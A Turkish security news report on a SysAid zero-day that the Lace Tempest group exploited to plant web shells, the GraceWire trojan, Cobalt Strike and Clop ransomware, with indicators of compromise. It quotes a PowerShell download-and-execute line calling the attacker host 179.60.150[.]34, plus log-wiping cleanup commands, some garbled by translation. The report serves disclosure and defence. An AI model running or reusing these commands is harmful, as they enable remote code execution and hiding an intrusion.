SysAid On-Prem yazılımının, olay müdahale incelemesi sırasında belirlenen 0 günlük bir güvenlik açığı olduğu bildirildi.
Microsoft’a göre saldırganlar, kurumsal sunuculara sızmak, hassas verileri çalmak ve meşhur Clop fidye yazılımını dağıtmak için bu sıfır gün güvenlik açığından yararlanıyor.
Bu rapor, şirketlerin değerli varlıklarını kötü niyetli saldırılardan korumak için siber güvenlik önlemlerine öncelik vermelerinin acil ihtiyacını vurguluyor.
SysAid, bir kuruluş genelinde BT hizmet yönetimi iş akışlarını kolaylaştırmak ve geliştirmek için tasarlanmış güçlü ve çok yönlü bir yazılım çözümüdür.
Çok çeşitli BT hizmetlerinin verimli ve etkili yönetimini sağlayan, kesintisiz operasyonlar ve gelişmiş üretkenlik sağlayan kapsamlı bir araç ve özellikler paketi sunar.
SysAid, güvenlik açığı üzerine hızlı bir şekilde harekete geçti ve azaltma çözümüyle iletişime geçti. Ayrıca yazılımın bu güvenlik açığını gideren yükseltilmiş bir sürümü de yayımlandı.
Güvenlik açığı Path Traversal ile ilişkilendirildi ve SysAid şirket içi yazılımında uzaktan kod yürütülmesine yol açtı.
Ancak bu güvenlik açığından Lace Tempest olarak bilinen bir tehdit grubu yararlandı. Tehdit aktörleri, WebShell ve diğer yükleri içeren bir WAR arşivini SysAid Tomcat web hizmetinin web köküne yüklediler.
SysAid BT Yazılımında 0 Günlük Kusur
WebShell, tehdit aktörüne, tehlikeye atılan sistem üzerinde yetkisiz erişim ve kontrol sağladı; tehdit aktörü, user.exe adı altında kötü amaçlı yazılım yükleyicisini çalıştıran bir PowerShell komut dosyasını yürütmek için bu sistemi kullandı.
Bu, spoolsv.exe, msiexec.exe veya svchost.exe işlemlerine enjekte edilen GraceWire truva atını yüklemek için kullanıldı.
Tehdit aktörü ilk erişimi elde edip kötü amaçlı yazılımı dağıttıktan sonra, diskteki ve web günlüklerindeki etkinlikleriyle ilişkili tüm izleri temizlemek için ikinci bir PowerShell betiği kullandı. Ayrıca tehdit aktörleri, truva atının yanı sıra MeshAgent uzaktan yönetim aracını da kullandı.
PowerShell Komut Dosyası Analizi
Kullanılan ilk PowerShell betiği, aynı zamanda C:\Program Files\SysAidServer\tomcat\webapps\usersfiles dizinine yerleştirilen tüm dosyaları listeleyen ve userfiles.war dosyası da dahil olmak üzere saldırı sırasında kullanılan tüm dosyaları kaldıran Kötü Amaçlı Yazılım yükleyicisini başlatmaktı. C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.* ile eşleşen tüm dosyalar
Kullanılan ikinci PowerShell betiği, istismarın tamamlanması için 5 saniye uyuyan ve SysAidServer\root\WEB-INF\logs ve SysAidServer\tomcat\logs dizinlerinde bulunan günlük dosyalarındaki tüm satırları kaldıran Kurban sunucularındaki kanıtları silmekti.
Daha sonraki eylemler için kurban ana bilgisayarında CobaltStrike dinleyicilerini indirip çalıştırmak için kullanılan üçüncü bir PowerShell betiği vardı.
Yararlanma, komut dosyası kodu ve diğer bilgiler hakkında ayrıntılı bilgi sağlayan eksiksiz bir rapor SysAid tarafından yayımlandı.
Uzlaşma Göstergeleri
Hash’ler
| Dosya adı | Sha256 | Yorum |
| kullanıcı.exe | b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d | Kötü amaçlı yükleyici |
| Meshagent.exe | 2035a69bc847dbad3b169cc74eb43fc9e6a0b6e50f0bbad068722943a71a4cca | Meshagent.exe uzaktan yönetici aracı |
IP Adresleri
| IP | Yorum |
| 81.19.138[.]52 | GraceWire Yükleyici C2 |
| 45.182.189[.]100 | GraceWire Yükleyici C2 |
| 179.60.150[.]34 | Kobalt Saldırısı C2 |
| 45.155.37[.]105 | Meshagent uzaktan yönetici aracı C2 |
Dosya Yolları
| Yol | Yorum |
| C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe | GraceWire |
| C:\Program Files\SysAidServer\tomcat\webapps\usersfiles.war | Saldırganın kullandığı WebShell’lerin ve araçların arşivi |
| C:\Program Files\SysAidServer\tomcat\webapps\leave | Yürütme sırasında saldırgan komut dosyaları için bayrak olarak kullanılır |
Komutlar
Kobalt Saldırısı
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w gizli -c IEX ((new-object net.webclient).downloadstring(‘http://179.60.150[.]34:80/a’)
Uzlaşma Sonrası Temizleme
Öğeyi Kaldır -Yol “$tomcat_dir\webapps\usersfiles\leave”.
Remove-Item -“$wapps\usersfiles.war”ı zorla.
Remove-Item -“$wapps\usersfiles\user.*” komutunu zorlayın.
& “$wapps\usersfiles\user.exe”.
Antivirüs Algılamaları
Truva Atı:Win32/TurtleLoader
Arka kapı: Win32/Clop
Fidye: Win32/Clop
StorageGuard ile depolama ve yedekleme sistemlerinizi korur – 40 saniyelik Video Turunu izleyin.